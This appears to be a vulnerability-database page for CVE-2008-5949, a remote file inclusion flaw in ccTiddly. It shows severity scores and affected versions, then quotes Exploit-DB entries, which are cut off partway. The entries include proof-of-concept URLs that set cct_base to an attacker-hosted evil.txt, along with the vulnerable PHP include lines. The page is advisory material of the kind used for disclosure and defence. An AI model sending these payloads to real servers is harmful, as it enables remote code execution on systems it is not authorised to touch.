CVE-2008-5949
published 2009-01-23CVE-2008-5949: Multiple PHP remote file inclusion vulnerabilities in ccTiddly 1.7.4 and 1.7.6 allow remote attackers to execute arbitrary PHP code via a URL in the cct_base…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.57%
83.2th percentile
Multiple PHP remote file inclusion vulnerabilities in ccTiddly 1.7.4 and 1.7.6 allow remote attackers to execute arbitrary PHP code via a URL in the cct_base parameter to (1) index.php; (2) handle/proxy.php; (3) header.php, (4) include.php, and (5) workspace.php in includes/; and (6) plugins/RSS/files/rss.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tiddlywiki | cctiddly | — | — |
| tiddlywiki | cctiddly | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ccTiddly 1.7.6 - Multiple Remote File Inclusions
exploitdb·2010-08-05
CVE-2008-5949 ccTiddly 1.7.6 - Multiple Remote File Inclusions
ccTiddly 1.7.6 - Multiple Remote File Inclusions
---
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Developer: http://tiddlywiki.org/wiki/CcTiddlyDeveloper
Download: http://tiddlywiki.org/ccTiddly/ccTiddly_v1.7.6.zip
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com
Original Advisories: http://eidelweiss-advisories.blogspot.com/2010/08/cctiddly-v176-multiple-remote-file.html
ccTiddly is a collaborative server side version of TiddlyWiki.
Note:
This is the same vuln in other lower version (http://www.exploit-db.com/exploits/7336/)
Vendor Not Fix the vulnerability in all folder !!!
-=[Vuln C0de]=-
[!] path/includes/in
Exploit-DB
ccTiddly 1.7.4 - 'cct_base' Remote File Inclusion
exploitdb·2008-12-04
CVE-2008-5949 ccTiddly 1.7.4 - 'cct_base' Remote File Inclusion
ccTiddly 1.7.4 - 'cct_base' Remote File Inclusion
---
/*
$Id: cctiddly-1.7.4-rfi.txt,v 0.1 2008/12/04 04:12:20 cOndemned Exp $
ccTiddly 1.7.4 (cct_base) Multiple Remote File Inclusion Vulnerabilities
found by cOndemned
download from : http://tiddlywiki.org/ccTiddly/ccTiddly_v1.7.4.zip
Probably prior versions are vulnerable too...
Greetz: ZaBeaTy, str0ke, TBH, Avantura
*/
0x01 :
file :
/index.php
poc :
http://[host]/[cctiddly_path]/index.php?cct_base=http://[attacker]/evil.txt?
source :
18. //includes
19. if(!isset($cct_base))
20. $cct_base = "";
21.
22. include_once($cct_base."includes/header.php");
23. include_once($cct_base."includes/login.php");
0x02 :
file :
/handle/proxy.php
poc :
http://[host]/[cctiddly_path]/handle/proxy.php?cct_base=http://[attacker]/evil.txt?
source :
No writeups or analysis indexed.
http://secunia.com/advisories/32995http://www.securityfocus.com/bid/32631https://exchange.xforce.ibmcloud.com/vulnerabilities/47072https://www.exploit-db.com/exploits/7336http://secunia.com/advisories/32995http://www.securityfocus.com/bid/32631https://exchange.xforce.ibmcloud.com/vulnerabilities/47072https://www.exploit-db.com/exploits/7336
2009-01-23
Published